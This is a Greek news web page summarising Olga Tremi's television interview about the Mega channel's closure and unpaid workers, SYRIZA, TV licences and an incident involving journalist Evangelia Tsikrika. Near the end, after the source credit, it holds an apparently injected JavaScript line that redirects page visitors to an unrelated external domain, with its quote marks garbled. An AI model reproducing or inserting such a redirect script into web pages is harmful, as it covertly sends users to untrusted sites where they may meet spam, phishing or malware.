Η Τρέμη για το Mega: Οι άνθρωποι εκεί εργάζονταν για τη φανέλα (BINTEO)

0
7

 

 

Η Όλγα Τρέμη καλεσμένη στην πρώτη εκπομπή της Τατιάνας Στεφανίδου μίλησε για τη δραματική κατάσταση που επικρατεί τους τελευταίους μήνες στο άλλοτε μεγάλο κανάλι, για τις τηλεοπτικές άδειες, για τη δαιμονοποίηση του Mega από τον ΣΥΡΙΖΑ, αλλά και για την επίθεση που δέχθηκε η δημοσιογράφος του Alpha Ευαγγελία Τσικρίκα.

Όπως είπε χαρακτηριστικά: «Στην περίπτωση του Mega η σχέση και ο δεσμός των εργαζομένων ή θα έλεγα των περισσότερων από τους εργαζόμενους είναι μοναδική. Πιο πολύ, κατά τη γνώμη μου, τους πειράζει και τους πονάει το γεγονός ότι κόβεται ένας ομφάλιος λώρος, γιατί αισθάνονταν ότι έχουν έναν ομφάλιο λώρο με το μαγαζί, πιο πολύ τους πειράζει από το ότι είναι απλήρωτοι. Πιο πολύ τους πειράζει ότι θα κλείσει το Mega παρά το γεγονός ότι δεν έχουν πληρωθεί τρεις μήνες.

Δεν το υποτιμώ καθόλου, ίσως υπερβάλω γιατί θέλω να τονίσει ένα άλλο στοιχείο, το οποίο ενδεχομένως να μην είναι γνωστό. Το να είσαι απλήρωτος σημαίνει μια εφιαλτική καθημερινότητα. Ο καθένας από εμάς έχει ανάγκες, έχει προβλήματα, έχει υποχρεώσεις, δεν το θεωρώ αμελητέο, αλλά οι περισσότεροι άνθρωποι στο Mega δεν εργάζονταν μόνο για τα χρήματα, αλλά και για τη φανέλα. Υπήρχε ειδική σχέση. Αν βάλουμε κάτω τα συναισθήματα, είναι ο πόνος, η θλίψη, είναι ένα τεράστιο “γιατί”.

Είναι τρομερός ο αιφνιδιασμός, τρομερό το σοκ κι επίσης υπάρχει και θυμός, το οποίο είναι δικαιολογημένο γιατί είναι ανθρώπινο. Όταν υπάρχει απώλεια, είναι προφανές ότι θα υπάρχει και θυμός. Και θλίψη και λύπη, αλλά θα υπάρχει και θυμός. Δεν ξέρω αν θα υπήρχε σωτηρία. Ήλπιζα και πίστευα ότι θα υπάρχει σωτηρία και είδα σε αυτή τη διάρκεια των πέντε μηνών τους μετόχους να αναζητούν πολύ συστηματικά έναν τρόπο να δοθεί λύση.

Τώρα που είμαστε στο τέλος, γιατί καταλαβαίνω ότι μάλλον είμαστε στο τέλος, λέω και κάτι άλλο, εφόσον υπάρχει η οικονομική δυνατότητα, πρέπει σε συνεργασία με τις τράπεζες να βρεθεί μια λύση, ούτως ώστε οι εργαζόμενοι να πάρουν τα δεδουλευμένα και τις αποζημιώσεις τους», είπε μεταξύ άλλων η Όλγα Τρέμη.

Για τη στοχοποίηση του καναλιού από τον ΣΥΡΙΖΑ και για το αν έχουν γίνει λάθος χειρισμοί στο Mega…

Η γιαγιά μου έλεγε μεγάλη μπουκιά φάε, μεγάλη κουβέντα μη πεις…Ο ΣΥΡΙΖΑ με τη στάση του και τις επιλογές του έλεγε ότι το δίλημμα είναι υπαρκτό και μεταξύ δύο κακών το μη χείρον βέλτιστο.
Η ζωή έχει δώσει την απάντηση της σε αυτό το θέμα.
Δεν μου αρέσει να θριαμβολογώ. Το Mega είχε στοχοποιηθεί και σήμερα ο ΣΥΡΙΖΑ λέει αυτό που λέγαμε εμείς. Ευρώπη ή μνημόνιο. Η αριστερά που ξέρω εγώ δεν είναι η αριστερά της δαιμονοποίησης των απόψεων, είναι η αριστερά του προβληματισμού, του διαλόγου, ήταν μια βολταιρική αριστερά. Τι σημαίνει αυτό; Σημαίνει, ότι διαφωνώ με όσα λες, αλλά θα μάχομαι μέχρι θανάτου για το δικαίωμα σου να το λες.

Για τις τηλεοπτικές άδειες
Έχει γίνει μακρά συζήτηση επί του θέματος αλλά κανείς δεν έχει απαντήσει γιατί 4 άδειες. Σε καμία ελεύθερη οικονομία δεν ρυθμίζουν οι κυβερνήσεις την αγορά. Θεωρώ πως δημιουργείται μια νέα γενιά με προβληματικές επιχειρήσεις στο χώρο των MME.

Πες μου πώς θα βγάλει ένα κανάλι τόσα λεφτά, όσα δόθηκαν για μία άδεια. Κινδυνεύουμε να έχουμε κακοπληρωμένους εργαζόμενους σε μεσαιωνικές συνθήκες εργασίας και τηλεόραση χαμηλότερης ποιότητας. Κατά τη γνώμη μου οι άνεργοι δύσκολα πια θα απορροφηθούν από την αγορά».

Για την επίθεση στην Ευαγγελία Τσικρίκα

Τσικρίκα power.Θέλω να σταθώ πολιτικά και ανθρώπινα στο θέμα. Είχαμε, χθες, μια απλή εργαζόμενη, που είπε σκληρές αλήθειες στον πρωθυπουργό. Ήταν μια απλή εργαζόμενη που βιώνει σκληρά τα όσα γίνονται αυτές τις ημέρες. Μίλησε χωρίς καμία υπερβολή. Αυτό το γεγονός αποδόμησε το κυβερνητικό επιχείρημα. Ήταν μια ρωγμή. Μπορεί να χρειαστεί πολιτική σιλικόνη για να την κλείσουν. Ήταν μια ρωγμή και γι αυτό το λόγο συζητήθηκε πολύ.

https://www.youtube.com/watch?v=Yg8lULd4Ipg

 

Πηγή: Zappit

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here